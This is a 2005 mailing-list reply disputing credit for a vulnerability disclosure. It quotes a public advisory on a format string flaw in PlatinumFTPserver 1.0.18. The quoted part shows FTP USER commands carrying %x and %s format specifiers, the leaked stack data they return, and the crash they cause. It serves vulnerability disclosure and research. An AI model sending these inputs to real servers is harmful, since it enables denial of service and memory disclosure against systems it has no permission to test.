Actually, the credits don't go to you, these vulnerabilities have been found already. I've replied recently to this mailing list in regards to this software. If you had disassembled the binary, then why not mention that the vulnerability exists in a 3rd party ActiveX control, and not the software itself? My reply, http://www.securityfocus.com/archive/1/393256/2005-03-13/2005-03-19/0 Please read the links below, http://www.osvdb.org/displayvuln.php?osvdb_id=3461 http://secunia.com/advisories/9127/ http://secunia.com/advisories/10608/ http://secunia.com/advisories/9013/ -Gary H. Jones II ----- Original Message ----- From: <c0d3r@xxxxxxxxxxx> To: <bugtraq@xxxxxxxxxxxxxxxxx> Cc: <news@xxxxxxxxxxxxxx> Sent: Wednesday, March 16, 2005 8:56 AM Subject: PlatinumFTPserver format string vulnerability ( IHSTeam ) ********************************************************************** advisory URL : http://www.ihsteam.com/advisory/PlatinumFTPserver.txt ********************************************************************** ******************************************** IHS Iran Hackers Sabotage Public advisory by : c0d3r "Kaveh Razavi" c0d3r@xxxxxxxxxxx ******************************************** well yesterday a guy found a simple user overflow in PlatinumFTPserver vr : 1.0.18 and prior. I downloaded the package at : http://www.roboshareware.com/products/PlatinumFTPserver.exe and started to disassemble the vulnerability . He was written a DoS . PlantiumFTP has got a good error controlling system . so eip overwrite is not easy . but I found another vulnerability when I was fuzzing . the server is also vulnerable to USER format string attack . here is the result : --------------------------------------- C:\Documents and Settings\root>ftp ftp> open 127.0.0.1 Connected to 127.0.0.1. 220-PlatinumFTPserver V1.0.18 220 Enter login details User (127.0.0.1:(none)): user %x%x 331 Password required for user 026d0048. Password: --------------------------------------- ftp> user AAAA%x%x%x%x 331 Password required for user AAAA026d0048020313333. Password: --------------------------------------- ftp> user AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x 331 Password required for AAAA026d00480203133337373615064726f7771657220657269756f662064414120727825414 1782578257825782578257825782578257825782578257825782578257825782578257825782 5782578257825782578257825782578257825782578257825782578257825782578257825782 5d2e782512000a77f5508212cdd812ce1012cdfc12cdb01305dc012ce00. Password: --------------------------------------- ftp> user AAAA%s%s 331 Password required for AAAAÈsÈjÈ{PÈ` . Password: --------------------------------------- ftp> user AAAA%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s hanging ==> szAppName : PlatinumFTPserverEngine.exe szAppVer : 1.0.0.18 szModName : user32.dll szModVer : 5.1.2600.1106 offset : 00008f7f The instruction at "0x01606feb" refrenced memory at "0xaf613daf". the memory could not be "written". --------------------------------------- and these kinda playing ! I am busy with university etrance exam stuff so I cant write the exploit code and really it doesnt cost . well laters . and this will be the last sweet to IHS until my shitty exam . all the credits go to IHSteam.com . greetz fly to : LorD and NT of ihsteam , Jamie of exploitdev.org and other friends and security teams . well I will come to u later shervin_kesafat my great lamer !
